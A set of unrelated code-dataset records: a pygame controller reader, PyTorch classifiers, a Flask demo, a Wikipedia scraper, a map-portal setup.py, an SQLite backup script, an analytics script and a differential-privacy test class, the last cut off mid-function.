+{"seq_id":"438219405","text":"import pygame\npygame.init()\njoysticks = []\nclock = pygame.time.Clock()\nkeepPlaying = True\n\n# for all the connected joysticks\nfor i in range(0, pygame.joystick.get_count()):\n\t# create a Joystick object in our list\n\tjoysticks.append(pygame.joystick.Joystick(i))\n\t# initialize the joystick we just appended (index -1 is the last list element)\n\tjoysticks[-1].init()\n\t# print a statement telling what the name of the controller is\n\tprint(\"Detected joystick '\", joysticks[-1].get_name(), \"'\")\n\t\nwhile keepPlaying:\n\tclock.tick(60)\n\tfor event in pygame.event.get():\n\t\t# only button-press events carry a .button attribute\n\t\tif event.type != pygame.JOYBUTTONDOWN:\n\t\t\tcontinue\n\t\t#The zero button is the 'a' button, 1 the 'b' button, 3 the 'y' button, 2 the 'x' button\n\t\tif event.button == 0:\n\t\t\tprint(\"A\")\n\t\tif event.button == 1:\n\t\t\tprint(\"B\")\n\t\tif event.button == 2:\n\t\t\tprint(\"X\")\n\t\tif event.button == 3:\n\t\t\tprint(\"Y\")\n","sub_path":"controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"540938937","text":"\r\n\r\nimport torch\r\nimport torch.nn as nn\r\nimport torch.nn.utils.rnn as rnn\r\n\r\n\r\nclass DenseNetwork(nn.Module):\r\n    def __init__(self, embeddings):\r\n        super(DenseNetwork, self).__init__()\r\n\r\n        \r\n        # Create any layers and attributes your network needs.\r\n        vocab_size = embeddings.shape[0]\r\n        embedding_dim = embeddings.shape[1]\r\n\r\n        # create and load embedding layer with pretrained Glove embeddings\r\n        # (from_pretrained is a classmethod that returns a new, initialized layer)\r\n        self.embedding = nn.Embedding.from_pretrained(embeddings)\r\n\r\n        # for layer 1\r\n        self.fc1 = nn.Linear(100, 36)\r\n\r\n        # non-linear activation\r\n        self.relu = nn.ReLU()\r\n\r\n        # for making y \in R^4\r\n        self.fc2 = 
nn.Linear(36, 4)\r\n\r\n        \r\n\r\n    def forward(self, x):\r\n        \r\n        #embedding layer\r\n        x = self.embedding(x)\r\n        \r\n        # sum Pooling \r\n        # reference: https://discuss.pytorch.org/t/how-to-perform-sum-pooling/3357/2\r\n        x = torch.sum(x, dim=1)\r\n        \r\n\r\n        # linear fcn on pooled\r\n        x = self.fc1(x)\r\n\r\n        # nonlinear fcn between hidden layer 1 and 2\r\n        x = self.relu(x)\r\n        # last layer --> output of 4 labels --> softmax --> output\r\n        x = self.fc2(x)\r\n        \r\n        # We DON'T do softmax here because nn.CrossEntropyLoss applies log-softmax itself\r\n        return x\r\n\r\n\r\n\r\nclass RecurrentNetwork(nn.Module):\r\n    def __init__(self, embeddings, num_layers):\r\n        super(RecurrentNetwork, self).__init__()\r\n\r\n        \r\n        vocab_size = embeddings.shape[0]\r\n        self.embedding_dim = embeddings.shape[1]\r\n        self.num_layers = num_layers\r\n\r\n        # create and load embedding layer with pretrained Glove embeddings\r\n        # (from_pretrained is a classmethod that returns a new, initialized layer)\r\n        self.embedding = nn.Embedding.from_pretrained(embeddings)\r\n\r\n        # Design GRU\r\n        self.gru = nn.GRU(self.embedding_dim, self.embedding_dim, self.num_layers, batch_first=True)\r\n\r\n        # output layer: hidden state -> 4 labels\r\n        self.fcn1 = nn.Linear(self.embedding_dim, 4)\r\n\r\n    # Gets length of sentence vector (somehow faster than torch.count_nonzero AND performs better! TA said was fine)\r\n    @staticmethod\r\n    def get_lengths(x):\r\n        x_lengths = []\r\n        for sentence in x:\r\n            counter = 0\r\n            for word in sentence:\r\n                if word != 0:\r\n                    counter += 1\r\n            x_lengths.append(counter)\r\n        return x_lengths\r\n    \r\n\r\n    # x is a PaddedSequence for an RNN\r\n    def forward(self, x):\r\n        \r\n\r\n\r\n        # Get real sentence lengths so padded items won't screw up our GRU\r\n        x_lengths = torch.count_nonzero(x, dim=1)\r\n        \r\n        # Embedding layer\r\n        embeds = self.embedding(x)\r\n        \r\n        # Pack the padded sequence\r\n        packed_input = torch.nn.utils.rnn.pack_padded_sequence(embeds,x_lengths, enforce_sorted=False, batch_first=True)\r\n\r\n        # Go through 2 layer GRU\r\n        # ACCORDING TO TA MUST USE HIDDEN FOR OUTPUT\r\n        __, hidden = self.gru(packed_input)\r\n\r\n        # Take last hidden layer transform and for output of 4 vals, which will be softmaxed in loss fcn\r\n        output = self.fcn1(hidden[-1])\r\n        \r\n        return output\r\n\r\n\r\n\r\n# references: https://towardsdatascience.com/a-comprehensive-guide-to-convolutional-neural-networks-the-eli5-way-3bd2b1164a53\r\n# and \"Text classification using Convolutional Neural Networks\" on youtube\r\nclass ExperimentalNetwork(nn.Module):\r\n    def __init__(self, embeddings):\r\n        super(ExperimentalNetwork, self).__init__()\r\n        \r\n        vocab_size = embeddings.shape[0]\r\n        self.embedding_dim = embeddings.shape[1]\r\n        \r\n\r\n\r\n        # create and load embedding layer with pretrained Glove embeddings\r\n        # (from_pretrained is a classmethod that returns a new, initialized layer)\r\n        self.embedding = nn.Embedding.from_pretrained(embeddings)\r\n\r\n\r\n        #dropout to prevent overfitting!\r\n        self.dropout = nn.Dropout(0.25)\r\n\r\n        # 1d convolution: 91 words per sentence vector as input channels, 8 output channels,\r\n        # sliding windows of 4 embedding dimensions (the Conv1d kernel size)\r\n        self.conv1 = nn.Conv1d(91, 8, 4)\r\n        # another conv layer\r\n        self.conv2 = nn.Conv1d(8, 16, 4)\r\n        self.relu = nn.ReLU()\r\n\r\n        # max pool the maxes \r\n        self.pool = nn.MaxPool1d(3)\r\n\r\n        # dense layer 1\r\n        self.fc1 = nn.Linear(496, 128)\r\n\r\n        # dense layer 2\r\n        self.fc2 = nn.Linear(128, 32)\r\n\r\n        # convert to labels that are softmaxable\r\n        self.fc3 = nn.Linear(32, 4)\r\n    \r\n    \r\n\r\n    # x is a PaddedSequence for an RNN\r\n    def forward(self, x):\r\n        
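# forward pass: pad to 91 tokens, embed, two Conv1d+ReLU blocks, max-pool,\r\n        # flatten, then three dense layers with dropout down to 4 output logits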
\r\n        # PADDING if sentence x isn't [128,91] (Thank you Antonio)\r\n        sent_length = x.shape[1]\r\n        if sent_length != 91:\r\n            pad_length = 91 - sent_length\r\n            pad = torch.nn.ConstantPad2d((0,pad_length,0,0),0)\r\n            x = pad(x)\r\n\r\n        \r\n\r\n        #embedding layer\r\n        x = self.embedding(x)\r\n        \r\n        #2 conv layers\r\n        x = self.relu(self.conv1(x))\r\n        x = self.relu(self.conv2(x))\r\n\r\n        # max pooling over the conv features (self.pool is an nn.MaxPool1d)\r\n        x = self.pool(x)\r\n        \r\n        # flatten\r\n        x = x.view(-1, self.num_flat_features(x))\r\n\r\n        # dense layer with relu activation\r\n        x = self.fc1(x)\r\n        x = self.relu(x)\r\n\r\n        # Dropout to avoid overfit\r\n        x = self.dropout(x)\r\n\r\n        # dense layer with relu activation\r\n        x = self.fc2(x)\r\n        x = self.relu(x)\r\n\r\n        # Dropout to avoid overfit\r\n        x = self.dropout(x)\r\n\r\n        # last layer --> output of 4 labels --> output --> softmax in loss\r\n        x = self.fc3(x)\r\n        \r\n        return x\r\n\r\n    # helper function for flattening\r\n    # src: https://pytorch.org/tutorials/beginner/blitz/neural_networks_tutorial.html\r\n    def num_flat_features(self, x):\r\n        size = x.size()[1:]  # all dimensions except the batch dimension\r\n        num_features = 1\r\n        for s in size:\r\n            num_features *= s\r\n        return num_features\r\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"}
+{"seq_id":"105483152","text":"from flask import Flask\nfrom flask import render_template\nfrom flask import request\napp = Flask(__name__)\n\n@app.route('/')\ndef index(): \n    # define the variables\n    userName = '홍길동'\n    userAge = 27\n    myList=['사과','포도','망고']\n    myTuple=(100,200,300,400)\n    myDict={'a':'apart','b':'banana','c':'cat'}\n    return render_template('index_var.html',userName=userName,\\\n        userAge=userAge,myList=myList,myTuple=myTuple,\\\n        myDict=myDict)\n\n\n\n# @app.route('/test1')\n# def test1():\n# return '

test1 start Page'\n\n# @app.route('/test1/sub1')\n# @app.route('/test1/sub2')\n# def test1_sub():\n# return '

test1 sub1 or test1 sub2 start Page'\n\n# # pass data in through the URL path (query-string style) and print it\n# @app.route('/test2/<data1>')\n# def test2(data1):\n# return 'data1 = %s' % data1\n\n# @app.route('/test2/<data1>/<data2>')\n# def test2_data1_data2(data1,data2):\n# return 'data1 = %s,data2=%s
    start Page' % (data1,data2)\n\n# #쿼리 스트링방식으로 데이터 전달 및 출력\n# #/라우터주소/<데이터값>\n# #라우터주소/<자료형:데이터값>\n# @app.route('/user/')\n# def show_user_profile(username):\n# return 'User %s' % username\n\n# @app.route('/user//')\n# def show_user_profile_age(username, age):\n# return 'Username %s, 나이 %d' % (username, age)\n# #http://127.0.0.1/user/홍길동/23/암행어사\n# @app.route('/user///')\n# def show_user_profile_age_job(username, age,job):\n# return 'Username %s, 나이 %d, 직업 %s' % (username, age,job)\n\napp.run(host='127.0.0.2', port=5000, debug=True)\n\n\n","sub_path":"app1.py","file_name":"app1.py","file_ext":"py","file_size_in_byte":1703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"498207713","text":"from bs4 import BeautifulSoup\nimport pandas as pd\nimport requests\n\n# Read the wiki page which gets updated for us continously\npage = requests.get('https://en.wikipedia.org/wiki/The_Voice_(U.S._TV_series)')\n\n# Parse the page as a BS obejct\nsoup = BeautifulSoup(page.content, 'lxml')\n\n# Grab all the tables\ntable = soup.find_all('table')\n\n# Turn all the tables into dataframes\ndfs = pd.read_html(str(table))\n\n# Extract all the contestant dataframes\ndf = dfs[5:18]\n\n# Clean up every dataframe\nfor i, frame in enumerate(df):\n frame.columns = frame.iloc[0]\n frame.drop(frame.index[0], inplace=True)\n\n# Lists for all useful parameters\ncontestants = []\nteams = []\nseasons = []\n\n# Grab info from dataframes\nfor i, frame in enumerate(df):\n contestants.append(frame.values)\n for k in range(frame.values.size):\n seasons.append(i+1)\n\n# Clean contestants list\ncontestants = [name for sublist in contestants for name in sublist]\ncontestants = [name for sublist in contestants for name in sublist]\n\n# Clean teams list\nfor frame in df:\n for person in contestants:\n for k in range(len(frame.index)):\n x = frame.columns[(frame == person).iloc[k]]\n x = x.format()\n if len(x) is not 0:\n teams.append(x)\n\nteams = [peep for sublist in teams for peep in sublist]\n\n# Create final dataframe\ndf = {'Contestant': contestants,\n 'Season': seasons,\n 'Team': teams}\n\ndf = pd.DataFrame(df)\nprint(df)\n\n# Write to csv\ndf.to_csv('ContestantData.csv')","sub_path":"ContestantData.py","file_name":"ContestantData.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"558698633","text":"#/usr/bin/env python\n#\n# (c) 2012 Commonwealth of Australia\n# Australian Bureau of Meteorology, COSPPac COMP\n# All Rights Reserved\n#\n# Authors: Danielle Madeley \n\nNAME = 'map-portal'\nDESCRIPTION = 'Map Portal'\nLONG_DESCRIPTION = \"\"\"\\\nCOMP Group Climate Portal\n\"\"\"\nAUTHOR = 'COMP'\nAUTHOR_EMAIL = 'COSPPac_COMP_Unit@bom.gov.au'\nURL = 'http://tuscany.bom.gov.au/wiki/index.php/Map_Portal'\n\nrpm_deps = [\n 'basemap >= 1.1.7',\n 'mapserver-python >= 6.0.1',\n 'matplotlib >= 1.1.0',\n 'netCDF4 >= 0.9.7',\n 'numpy >= 1.6.1',\n 'scipy >= 0.9.0',\n]\n\nsrc = [\n 'map.py',\n 'portal.py',\n 'regions.py',\n 'logs.py',\n]\n\npackages = [\n 'ocean',\n # core\n 'ocean.config',\n 'ocean.netcdf',\n 'ocean.util',\n 'ocean.plotter',\n 'ocean.processing',\n # dataset\n 'ocean.datasets',\n 'ocean.datasets.bran',\n 'ocean.datasets.ersst',\n 'ocean.datasets.sealevel',\n 'ocean.datasets.reynolds',\n 'ocean.datasets.ww3',\n 'ocean.datasets.ww3forecast',\n 'ocean.datasets.coral',\n 'ocean.datasets.chlorophyll',\n 'ocean.datasets.poamasla',\n 'ocean.datasets.poamassta',\n 
'ocean.datasets.currentforecast',\n 'ocean.datasets.convergence',\n 'ocean.datasets.msla',\n 'ocean.datasets.mur',\n 'ocean.datasets.tideforecast'\n]\n\nscripts = [\n 'replicate-portal-data',\n 'cleanup-raster-cache',\n 'update-data'\n]\n\n# run generate-manifest.py after editing these sections\nbackend_resources = [\n 'maps/bathymetry.map',\n 'maps/mean.map',\n 'maps/mean_sub.map',\n 'maps/anom.map',\n 'maps/dec.map',\n 'maps/trend.map',\n 'maps/hs.map',\n 'maps/chlo.map',\n 'maps/coral_daily.map',\n 'maps/coral_outlook.map',\n 'maps/wav.map',\n 'maps/wnd.map',\n 'maps/grey.map',\n 'maps/poamasla.map',\n 'maps/current.map',\n 'maps/mur.map',\n 'maps/contour.map',\n 'maps/normal.map',\n 'maps/salt.map',\n 'maps/uv.map',\n 'maps/front.map',\n 'maps/height.map',\n 'fonts/fonts.list',\n 'fonts/DejaVuSans.ttf',\n]\n\nmap_layer_extensions = ['dbf', 'prj', 'shp', 'shx' ]\nmap_layers = [\n 'bathymetry_0',\n 'bathymetry_200',\n 'bathymetry_1000',\n 'bathymetry_2000',\n 'bathymetry_3000',\n 'bathymetry_4000',\n 'bathymetry_5000',\n 'bathymetry_6000',\n 'bathymetry_7000',\n 'bathymetry_8000',\n 'bathymetry_9000',\n 'bathymetry_10000',\n 'ocean',\n 'pacific_islands_capitals',\n 'southern_pac',\n 'northern_pac',\n 'land',\n 'COSPPac_EEZs',\n 'ReefLocations',\n 'CRW_Outlines',\n 'MP_FINAL',\n 'CRW_Outlook_EEZ'\n]\n\nBASE_PATH = 'share/portal'\nhtml = [\n 'ocean.html',\n 'app.html'\n]\n\nscript_substitutions = {\n # development version, compressed version\n 'jquery.js': ('jquery-1.11.3.js', 'jquery-1.11.3.min.js'),\n 'jquery-ui.js': ('jquery-ui-1.9.2.custom/js/jquery-ui-1.9.2.custom.js',\n 'jquery-ui-1.9.2.custom/js/jquery-ui-1.9.2.custom.min.js'),\n 'jquery-ui.css': ('jquery-ui-1.9.2.custom/css/smoothness/jquery-ui-1.9.2.custom.css',\n 'jquery-ui-1.9.2.custom/css/smoothness/jquery-ui-1.9.2.custom.min.css'),\n 'OpenLayers.js': ('OpenLayers.js', 'OpenLayers.min.js'),\n}\n\nweb_files = [\n 'css/comp/controlPanel.css',\n 'css/comp/compmap.css',\n 'css/comp/controlvars.css',\n 'css/comp/jumbotron.css',\n 'css/comp/dragdealer.css',\n 'js/comp/controlPanel.js',\n 'js/comp/compmap.js',\n 'js/comp/dsConf.js',\n 'js/comp/app.js',\n 'js/comp/dragdealer.js',\n 'js/comp/Ocean.js',\n 'js/comp/data_points_to_load.js',\n 'js/comp/tide_gauges_to_load.js'\n]\n\ndata = [\n 'config/comp/datasets.json',\n 'config/comp/vargroups.json',\n 'config/comp/portals.json',\n 'config/comp/app.json',\n 'config/comp/tidegauges.geojson',\n 'images/search.gif',\n 'images/calendar-blue.gif',\n 'images/blank.png',\n 'images/loading.gif',\n 'images/notavail.png',\n 'images/climate.jpg',\n 'images/bom_logo.gif',\n 'images/bathymetry_ver.png',\n 'images/email.png',\n 'images/climate.png',\n 'images/coral.png',\n 'images/fishing.png',\n 'images/sealevel.png',\n 'images/shipping.png',\n 'images/surfer.png',\n 'images/daily_0.png',\n 'images/daily_1.png',\n 'images/daily_2.png',\n 'images/daily_3.png',\n 'images/daily_4.png',\n 'images/outlook_0.png',\n 'images/outlook_1.png',\n 'images/outlook_2.png',\n 'images/outlook_3.png',\n 'images/outlook_4.png',\n 'help/about_BRAN.pdf',\n 'help/about_sealevel.pdf',\n 'help/about_ww3forecasts.pdf',\n 'help/about_ww3climate.pdf',\n 'help/about_chlorophyll.pdf',\n 'help/about_coralbleaching.pdf',\n 'help/about_currents.pdf',\n 'help/about_OceanTemperature.pdf',\n 'help/about_POAMA_Sea_Level.pdf',\n 'help/about_POAMA_SST.pdf',\n 'help/Beverly_11_Remote_sensing_guide.pdf',\n 'help/about_AVISO_Sea_Level.pdf',\n 'help/about_MUR_Fronts.pdf'\n]\n\n# CODE BEGINS\nimport os.path\n\nbackend_resources += [ 
os.path.join('maps', 'layers', '%s.%s' % (l, ext))\n for l in map_layers\n for ext in map_layer_extensions ]\n\nif __name__ == '__main__':\n from distutils.core import setup\n from distutils.command.bdist_rpm import bdist_rpm\n\n from localdistutils.dist import PortalDist\n from localdistutils.build import build\n from localdistutils.build_py import build_py\n from localdistutils.build_web import build_web\n from localdistutils.install import install\n from localdistutils.install_web import install_web\n from localdistutils import util\n\n import itertools\n\n # add Requires: for RPM\n _original_make_spec_file = bdist_rpm._make_spec_file\n def _make_spec_file(*args):\n spec = _original_make_spec_file(*args)\n spec.insert(spec.index('%description') - 1,\n 'Requires: %s' % ', '.join(rpm_deps))\n return spec\n bdist_rpm._make_spec_file = _make_spec_file\n\n data_files = \\\n [ ('/var/www/cgi-bin/portal', [ os.path.join('src', s) for s in src ]) ] + \\\n [ (os.path.join(BASE_PATH, d), list(f))\n for d, f in itertools.groupby(data, lambda e: os.path.dirname(e)) ]\n\n setup(name=NAME,\n version=util.get_version(),\n author=AUTHOR,\n author_email=AUTHOR_EMAIL,\n url=URL,\n description=DESCRIPTION,\n long_description=LONG_DESCRIPTION,\n\n packages=packages,\n package_data={\n 'ocean': [ os.path.join('resource', r)\n for r in backend_resources ],\n },\n scripts=[ os.path.join('src', s) for s in scripts ],\n data_files = data_files,\n\n # FIXME: BASE_PATH here is ignored because I'm lazy, BASE_PATH from\n # web_files is used\n html_files = (BASE_PATH,\n [ os.path.join('html', h) for h in html ],\n script_substitutions),\n web_files = (BASE_PATH, web_files),\n\n # extend distutils\n distclass=PortalDist,\n cmdclass={\n 'build': build,\n 'build_py': build_py,\n 'build_web': build_web,\n 'install': install,\n 'install_web': install_web,\n },\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":7275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"356848789","text":"import sqlite3\nimport apsw\nimport time\ncurrent_time = int(time.time())\n_connection = apsw.Connection('app.db')\nconnection = sqlite3.connect(_connection)\n# Use connection as DB-API 2.0, then \"Save-As\" like this:\ndestdb = apsw.Connection('/usr/lib/cytora/backups/backup-' + str(current_time) + \".db\")\nwith destdb.backup(\"main\", _connection, \"main\") as backup:\n while not backup.done:\n \tbackup.step(100)\n\n","sub_path":"backup-sqlite.py","file_name":"backup-sqlite.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"596913395","text":"#/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('/home/takagi/git/analytics/analytics_tool')\nimport utility.db_utility as db_util\nfrom datetime import datetime as dt\nimport commands\nimport utility.device_master as dev_master\nimport utility.easy_access as ea\nimport utility.date_func as df\n\nargvs = sys.argv\nlower = 20130625\n#DB\n\n#課金した日の取得\ndata = ea.first_subscription(\"kidsnbooks\", 20130625, 20130930)\n\n#本データ\nfor i in range(110):\n date = df.ndaysago(lower, -i)\n b = ea.kidsnbooks_booklog(date)\n for uid, d in data.items():\n data[uid].setdefault(\"book_id\", None)\n data[uid].setdefault(\"book_name\", None)\n data[uid].setdefault(\"date\", None)\n if b.has_key(uid):\n if d[\"date\"] == None or (d[\"date\"] > b[uid][\"start\"] and b[uid][\"start\"] >= d[\"subdate\"]):\n 
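# keep the earliest book start seen for this user (first hit, or an earlier start on/after the subscription date)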
data[uid][\"date\"] = b[uid][\"start\"]\n data[uid][\"book_id\"] = b[uid][\"book_id\"]\n data[uid][\"book_name\"] = b[uid][\"book_name\"]\n \n\n\n#summary\nsummary = {}\nfor uid, d in data.items():\n summary.setdefault(d[\"book_id\"], {})\n summary[d[\"book_id\"]].setdefault(\"name\", d[\"book_name\"])\n summary[d[\"book_id\"]].setdefault(\"uu\", 0)\n if d[\"subdate\"] != None:\n summary[d[\"book_id\"]][\"uu\"] += 1\n\n\n#output\nout = open(\"/home/takagi/git/analytics/spot/data_temp/subscription_initial_book\", 'w')\n\nfor book_id, app in summary.items():\n if summary[book_id][\"uu\"] > 0:\n record = str(book_id) + \"\\t\"\n record += str(summary[book_id][\"name\"]) + \"\\t\"\n record += str(summary[book_id][\"uu\"]) + \"\\n\"\n out.write(record)\n\nout.close()\n\n\n","sub_path":"work/analytics/spot/kidsnbooks/subscription_initial_book_20130924.py","file_name":"subscription_initial_book_20130924.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"633424748","text":"# This file contains a list of tests that can be passed actual aggregates or result aggregates from a DP implementation\n# It tries to use a sample dataset S and splits it randomly into two neighboring datasets D1 and D2\n# Using these neighboring datasets, it applies the aggregate query repeatedly\n# It tests the DP condition to let the DP implementer know whether repeated aggregate query results are not enough to re-identify D1 or D2 which differ by single individual\n# i.e. passing (epsilon, delta) - DP condition\n# If the definition is not passed, there is a bug or it is a by-design bug in case of passing actual aggregates\n\nimport pandas as pd\nimport numpy as np\nimport math\nimport matplotlib.pyplot as plt\nimport Aggregation as agg\nimport os\nfrom scipy import stats\n\nclass DPVerification:\n # Set the epsilon parameter of differential privacy\n def __init__(self, epsilon=1.0, dataset_size=10000):\n self.epsilon = epsilon\n self.dataset_size = dataset_size\n self.file_dir = os.path.dirname(os.path.abspath(__file__))\n self.csv_path = r'../service/datasets'\n self.df, self.dataset_path, self.file_name = self.create_simulated_dataset()\n print(\"Loaded \" + str(len(self.df)) + \" records\")\n self.N = len(self.df)\n self.delta = 1/(self.N * math.sqrt(self.N))\n\n def create_simulated_dataset(self, file_name = \"simulation\"):\n np.random.seed(1)\n userids = list(range(1, self.dataset_size+1))\n userids = [\"A\" + str(user) for user in userids]\n usage = np.random.geometric(p=0.5, size=self.dataset_size).tolist()\n df = pd.DataFrame(list(zip(userids, usage)), columns=['UserId', 'Usage'])\n \n # Storing the data as a CSV\n file_path = os.path.join(self.file_dir, self.csv_path, file_name + \".csv\")\n df.to_csv(file_path, sep=',', encoding='utf-8', index=False)\n return df, file_path, file_name\n\n # Generate dataframes that differ by a single record that is randomly chosen\n def generate_neighbors(self, load_csv = False):\n if(load_csv):\n self.df = pd.read_csv(self.dataset_path)\n \n if(self.N == 0):\n print(\"No records in dataframe to run the test\")\n return None, None\n \n d1 = self.df\n drop_idx = np.random.choice(self.df.index, 1, replace=False)\n d2 = self.df.drop(drop_idx)\n print(\"Length of D1: \", len(d1), \" Length of D2: \", len(d2))\n\n d1_yaml_path, d2_yaml_path = \"\", \"\"\n if(load_csv):\n # Storing the data as a CSV for applying queries via Burdock querying system\n d1_file_path = 
os.path.join(self.file_dir, self.csv_path , \"d1.csv\")\n d2_file_path = os.path.join(self.file_dir, self.csv_path , \"d2.csv\")\n d1_yaml_path = os.path.join(self.file_dir, self.csv_path , \"d1.yaml\")\n d2_yaml_path = os.path.join(self.file_dir, self.csv_path , \"d2.yaml\")\n d1.to_csv(d1_file_path, sep=',', encoding='utf-8', index=False)\n d2.to_csv(d2_file_path, sep=',', encoding='utf-8', index=False)\n\n return d1, d2, d1_yaml_path, d2_yaml_path\n \n # If there is an aggregation function that we need to test, we need to apply it on neighboring datasets\n # This function applies the aggregation repeatedly to log results in two vectors that are then used for generating histogram\n # The histogram is then passed through the DP test\n def apply_aggregation_neighbors(self, f, args1, args2):\n fD1 = f(*args1)\n fD2 = f(*args2)\n\n print(\"Mean fD1: \", np.mean(fD1), \" Stdev fD1: \", np.std(fD1), \" Mean fD2: \", np.mean(fD2), \" Stdev fD2: \", np.std(fD2))\n return fD1, fD2\n\n # Instead of applying function to dataframe, this'll pass a query through PrivSQL and get response\n # This way we can test actual SQLDP implementation\n def apply_query_neighbors(self, d1, d2, agg_query):\n # To do\n return None\n\n # Generate histograms given the vectors of repeated aggregation results applied on neighboring datasets\n def generate_histogram_neighbors(self, fD1, fD2, numbins=0, binsize=\"auto\", exact=False):\n d1 = fD1\n d2 = fD2\n d = np.concatenate((d1, d2), axis=None)\n n = d.size\n binlist = []\n minval = min(min(d1), min(d2))\n maxval = max(max(d1), max(d2))\n if(exact):\n binlist = np.linspace(minval, maxval, 2)\n elif(numbins > 0):\n binlist = np.linspace(minval, maxval, numbins)\n elif(binsize == \"auto\"):\n iqr = np.subtract(*np.percentile(d, [75, 25]))\n numerator = 2 * iqr if iqr > 0 else maxval - minval\n denominator = n ** (1. 
/ 3)\n binwidth = numerator / denominator # Freedman–Diaconis' choice\n numbins = int(math.ceil((maxval - minval) / binwidth))\n binlist = np.linspace(minval, maxval, numbins)\n else:\n # Choose bin size of unity\n binlist = np.arange(np.floor(minval),np.ceil(maxval))\n \n # Calculating histograms of fD1 and fD2\n d1hist, bin_edges = np.histogram(d1, bins = binlist, density = False)\n print(\"Sum of frequencies in D1 Histogram: \", np.sum(d1hist))\n d2hist, bin_edges = np.histogram(d2, bins = binlist, density = False)\n print(\"Sum of frequencies in D2 Histogram: \", np.sum(d2hist))\n\n return d1hist, d2hist, bin_edges\n \n # Plot histograms given the vectors of repeated aggregation results applied on neighboring datasets\n def plot_histogram_neighbors(self, fD1, fD2, d1histupperbound, d2histupperbound, d1hist, d2hist, d1lower, d2lower, binlist, bound=True, exact=False):\n plt.figure(figsize=(15,6))\n if(exact):\n ax = plt.subplot(1, 1, 1)\n ax.ticklabel_format(useOffset=False)\n plt.xlabel('Bin')\n plt.ylabel('Probability')\n plt.hist(fD1, width=0.2, alpha=0.5, ec=\"k\", align = \"right\", bins = 1)\n plt.hist(fD2, width=0.2, alpha=0.5, ec=\"k\", align = \"right\", bins = 1)\n ax.legend(['D1', 'D2'], loc=\"upper right\")\n return\n \n ax = plt.subplot(1, 2, 1)\n ax.ticklabel_format(useOffset=False)\n plt.xlabel('Bin')\n plt.ylabel('Frequency')\n if(bound):\n plt.bar(binlist[:-1], d2histupperbound, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.bar(binlist[:-1], d1lower, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.legend(['D1', 'D2'], loc=\"upper right\")\n else:\n plt.bar(binlist[:-1], d1hist, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.bar(binlist[:-1], d2hist, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.legend(['D1', 'D2'], loc=\"upper right\")\n\n ax = plt.subplot(1, 2, 2)\n ax.ticklabel_format(useOffset=False)\n plt.xlabel('Bin')\n plt.ylabel('Frequency')\n if(bound):\n plt.bar(binlist[:-1], d1histupperbound, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.bar(binlist[:-1], d2lower, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.legend(['D2', 'D1'], loc=\"upper right\")\n else:\n plt.bar(binlist[:-1], d2hist, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.bar(binlist[:-1], d1hist, alpha=0.5, width=np.diff(binlist), ec=\"k\", align=\"edge\")\n plt.legend(['D2', 'D1'], loc=\"upper right\")\n plt.show()\n\n # Check if histogram of fD1 values multiplied by e^epsilon and summed by delta is bounding fD2 and vice versa\n # Use the histogram results and create bounded histograms to compare in DP test\n def get_bounded_histogram(self, d1hist, d2hist, binlist, d1size, d2size, exact, alpha=0.05):\n d1_error_interval = 0.0\n d2_error_interval = 0.0\n # Lower and Upper bound\n if(not exact):\n num_buckets = binlist.size - 1\n critical_value = stats.norm.ppf(1-(alpha / 2 / num_buckets), loc=0.0, scale=1.0)\n d1_error_interval = critical_value * math.sqrt(num_buckets / d1size) / 2\n d2_error_interval = critical_value * math.sqrt(num_buckets / d2size) / 2\n\n num_buckets = binlist.size - 1\n px = np.divide(d1hist, d1size)\n py = np.divide(d2hist, d2size)\n\n d1histbound = px * math.exp(self.epsilon) + self.delta\n d2histbound = py * math.exp(self.epsilon) + self.delta\n\n d1upper = np.power(np.sqrt(px * num_buckets) + d1_error_interval, 2) / num_buckets\n d2upper = np.power(np.sqrt(py * num_buckets) + d2_error_interval, 2) / num_buckets\n d1lower = 
np.power(np.sqrt(px * num_buckets) - d1_error_interval, 2) / num_buckets\n        d2lower = np.power(np.sqrt(py * num_buckets) - d2_error_interval, 2) / num_buckets\n\n        # clamp the lower bounds at zero in place (the third argument is the output array)\n        np.maximum(d1lower, 0.0, d1lower)\n        np.maximum(d2lower, 0.0, d2lower)\n\n        d1histupperbound = d1upper * math.exp(self.epsilon) + self.delta\n        d2histupperbound = d2upper * math.exp(self.epsilon) + self.delta\n        \n        return px, py, d1histupperbound, d2histupperbound, d1histbound, d2histbound, d1lower, d2lower\n\n    # Differentially Private Predicate Test\n    def dp_test(self, d1hist, d2hist, binlist, d1size, d2size, debug=False, exact=False):\n        px, py, d1histupperbound, d2histupperbound, d1histbound, d2histbound, d1lower, d2lower = \\\n            self.get_bounded_histogram(d1hist, d2hist, binlist, d1size, d2size, exact)\n        if(debug):\n            print(\"Parameters\")\n            print(\"epsilon: \", self.epsilon, \" delta: \", self.delta)\n            print(\"Bins\\n\", binlist)\n            print(\"Original D1 Histogram\\n\", d1hist)\n            print(\"Probability of D1 Histogram\\n\", px)\n            print(\"D1 Lower\\n\", d1lower)\n            print(\"D1 Upper\\n\", d1histupperbound)\n            print(\"D1 Histogram to bound D2\\n\", d1histbound)\n            print(\"Original D2 Histogram\\n\", 